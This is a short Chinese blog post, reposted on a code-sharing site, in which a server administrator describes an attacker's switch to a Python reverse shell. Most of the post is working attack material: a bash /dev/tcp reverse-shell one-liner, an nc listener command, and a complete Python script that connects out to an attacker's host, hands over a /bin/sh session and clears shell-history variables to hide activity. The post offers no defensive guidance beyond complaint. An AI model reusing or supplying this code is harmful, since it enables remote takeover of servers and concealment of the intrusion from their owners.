码迷,mamicode.com
首页 > 编程语言 > 详细

以Python写的 反弹工具

时间:2019-04-24 12:07:01      阅读:321      评论:0      收藏:0      [点我收藏+]

标签:nec   coding   mod   glob   version   stc   通过   back   命令   

 

我们知道,一般的反弹shell   

可以直接使用   base 反弹

bash -i >& /dev/tcp/ownip/port 0>&1

还可以使用一些简单的命令   nc  nmap 等等。。。。

nc -l -p port -vv xxx

 

经过前几次的攻击,他也变聪明了,知道我针对了php 的文件加强了管控,

所以它又有针对性的使用了Linux自带的Python  进行基于Python的反弹

 

源码:

# -*- coding:utf-8 -*-
#!/usr/bin/env python
"""
back connect py version,only linux have pty module
code by google security team
"""
import sys,os,socket,pty
shell = "/bin/sh"

def usage(name):
    print ‘python reverse connector‘
    print ‘usage: %s <ip_addr> <port>‘ % name

def main():
    if len(sys.argv) !=3:
        usage(sys.argv[0])
        sys.exit()
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    try:
        s.connect((sys.argv[1],int(sys.argv[2])))
        print ‘connect ok‘
    except:
        print ‘connect faild‘
        sys.exit()
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    global shell
    os.unsetenv("HISTFILE")
    os.unsetenv("HISTFILESIZE")
    os.unsetenv("HISTSIZE")
    os.unsetenv("HISTORY")
    os.unsetenv("HISTSAVE")
    os.unsetenv("HISTZONE")
    os.unsetenv("HISTLOG")
    os.unsetenv("HISTCMD")
    os.putenv("HISTFILE",‘/dev/null‘)
    os.putenv("HISTSIZE",‘0‘)
    os.putenv("HISTFILESIZE",‘0‘)
    pty.spawn(shell)
    s.close()

if __name__ == ‘__main__‘:
    main()

 

很恶心啊 ,可以看到通过os函数,针对环境变量无限向我服务器上传参

我查询资料 还发现  即使你禁所有端口,只开放80 端口,也还能通过Python绕过去TCP。从UDP上去。恶心至极啊!!!

谢邀大神

友情链接:

https://www.cnblogs.com/mujj/articles/3272401.html 

以Python写的 反弹工具

标签:nec   coding   mod   glob   version   stc   通过   back   命令   

原文地址:https://www.cnblogs.com/huidou/p/10761491.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!